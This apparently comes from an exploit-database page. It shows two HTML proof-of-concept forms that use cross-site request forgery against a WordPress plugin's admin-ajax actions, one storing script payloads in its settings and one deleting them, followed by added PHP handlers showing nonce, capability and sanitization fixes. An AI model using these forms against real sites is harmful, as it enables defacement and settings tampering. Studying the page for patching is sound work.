## https://sploitus.com/exploit?id=WPEX-ID:169D21FC-D191-46FF-82E8-9AC887AED8A4
CSRF to XSS
```html
<html>
  <body>
    <form action="[TARGETSITE]/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="save_fbe_settings" />
      <input type="hidden" name="pixelId" value="<script>alert(0)</script>" />
      <input type="hidden" name="accessToken" value="<script>alert(0)</script>" />
      <input type="hidden" name="externalBusinessId" value="<script>alert(0)</script>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
CSRF to Delete settings
```html
<html>
  <body>
    <form action="[TARGETSITE]/wp-admin/admin-ajax.php">
      <input type="hidden" name="action" value="delete_fbe_settings" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
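
The defensive counterpart to the two forms above, as an added example (not the plugin's own code, which this page does not show): WordPress AJAX handlers for the same two actions that require an administrator capability and a nonce, so a cross-site form submission is rejected, and that sanitize the three fields before storing them. The function names, nonce action and option name are hypothetical.

```php
<?php
// Added example: hypothetical handlers, not the plugin's actual code.
const EXAMPLE_FBE_NONCE  = 'example_fbe_settings_nonce'; // assumed nonce action
const EXAMPLE_FBE_OPTION = 'example_fbe_settings';       // assumed option name

// Shared gate for every state-changing action.
function example_fbe_authorize() {
    // Only accept state changes over POST (the delete form above uses GET).
    if ( 'POST' !== $_SERVER['REQUEST_METHOD'] ) {
        wp_send_json_error( 'method not allowed', 405 );
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    // Ends the request with 403 when the 'nonce' field is missing or invalid.
    // A form hosted on another origin cannot read the admin's nonce.
    check_ajax_referer( EXAMPLE_FBE_NONCE, 'nonce' );
}

function example_save_fbe_settings() {
    example_fbe_authorize();
    $clean = array();
    foreach ( array( 'pixelId', 'accessToken', 'externalBusinessId' ) as $key ) {
        $raw = isset( $_POST[ $key ] ) ? wp_unslash( $_POST[ $key ] ) : '';
        // sanitize_text_field() strips tags, so "<script>alert(0)</script>"
        // is never stored as markup.
        $clean[ $key ] = sanitize_text_field( $raw );
    }
    // Assumption: a pixel ID consists of digits only; reject anything else.
    if ( ! ctype_digit( $clean['pixelId'] ) ) {
        wp_send_json_error( 'invalid pixelId', 400 );
    }
    update_option( EXAMPLE_FBE_OPTION, $clean );
    wp_send_json_success();
}

function example_delete_fbe_settings() {
    example_fbe_authorize();
    delete_option( EXAMPLE_FBE_OPTION );
    wp_send_json_success();
}

// wp_ajax_{action} hooks fire only for logged-in users.
add_action( 'wp_ajax_save_fbe_settings', 'example_save_fbe_settings' );
add_action( 'wp_ajax_delete_fbe_settings', 'example_delete_fbe_settings' );
```

Stored values should still be escaped where they are printed (for example with `esc_attr()` or `esc_js()`), since input sanitization alone does not protect data written before the fix.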